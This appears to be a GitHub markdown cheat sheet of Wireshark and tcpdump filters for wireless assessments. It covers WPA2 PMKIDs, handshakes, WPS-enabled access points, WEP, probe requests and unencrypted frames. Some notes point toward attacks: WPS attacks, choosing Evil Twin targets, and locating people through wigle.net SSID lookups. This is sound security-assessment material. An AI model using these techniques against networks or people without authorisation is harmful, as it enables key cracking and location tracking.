Skip to content

Latest commit

 

History

History
134 lines (91 loc) · 3.17 KB

wifi-capture-filters.md

File metadata and controls

134 lines (91 loc) · 3.17 KB

Wifi Capture Filters

WPA2 Networks

  • identify a network that is using WPA2-PSK
wlan.tag.number == 221 or wlan.tag.number == 48

WPA2 PMKID

  • PMKID is a unique, per client key identifier found in the first EAPOL frame
  • Contained in optional RSN IE for AP roaming
  • Assigned at the time of joining a network to track with PMK should be used for the network
  • The PMKID is used to identify to the AP which PMK should be used for the newly roamed client.
wlan.rsn.ie.pmkid
# OR
wlan.tag.number eq 221

WPS Detection

  • We can see if an AP supports WPS, allowing for WPS attacks
wps.wifi_protected_setup_state eq 0x02

WEP Networks

  • Per Wigle.net as of 2024, WEP networks make up less than 5% of all wireless networks, however they can still be found!
  • In every WEP packet is an:
    • initialization vector
    • key index number
    • integrity check value.
  • Display only WEP encrypted data packets
wlan.wep.iv

BSSID

  • Filtering on BSSIDs
!wlan.bssid eq 58:6d:8f:07:4e:8d
wlan.bssid eq 58:6d:8f:07:4e:8d

Handshakes

  • To filter for four-way handshake packets in Wireshark 
eapol
  • To filter for four-way handshake packets in tcpdump or to set a capture filter to only grab four-way handshake packets.
ether proto 0x888e

Beacons

  • wireshark filter for beacon frames 
wlan.fc.type_subtype == 0x0008

Management Frames

  • wireshark filter for management frames 
wlan.fc.type == 0

Probe Requests

  • Find clients looking for SSID names. Useful if you are looking to stand up an Evil Twin and would like a specific client to connect to you.
  • Probe requests can have privacy implications. If you capture SSID names and they are unique, you are able to query https://wigle.net to potentially find home locations/work locations
(wlan.fc.subtype == 4) && (wlan.fc.type == 0)
# filter out probe requests
!(wlan.fc.subtype == 4) && !(wlan.fc.type == 0)

WPA3 PSK networks

  • We can identify these networks in a wireshark pcap by filtering off the Auth Key Management suite in use 
wlan.fc.type_subtype == 0x0008 && wlan.rsn.akms == 0x00FAC08
  • above AKMS identifies the most common key type in use GCMP-128

Find Data packets with no Frame Body Encryption

  • Encryption can still be used at the application layer i.e. TLS
  • Can catch protocols that are not encrypted 
wlan.fc.protected == 0 && wlan.fc.type == 2

WPA3 Transition networks

  • wireshark filter for WPA3 transition networks. They will have to broadcast two cipher suites at once 
wlan.fc.type_subtype == 0x0008 && wlan.rsn.akms ==  0x000FAC02 && wlan.rsn.akms == 0x000FAc08
  • 0x000FAC02 == WPA2
  • 0x000FAC08 == WPA3

Tcpdump no Beacons / Control frames

tcpdump -i wlan0mon -s 0 -n -w out.pcap 'not type mgt subtype beacon and not type ctl'
  • capture the whole packet with -s 0
  • capture everything that are not beacon frames + control frames (loud)
    • generally 10 beacon frames a second from each AP. If you are in range of 20 APs that can get rough quickly on pcap size
  • Great assessment tcpdump filter for assessments on smaller devices like a Pi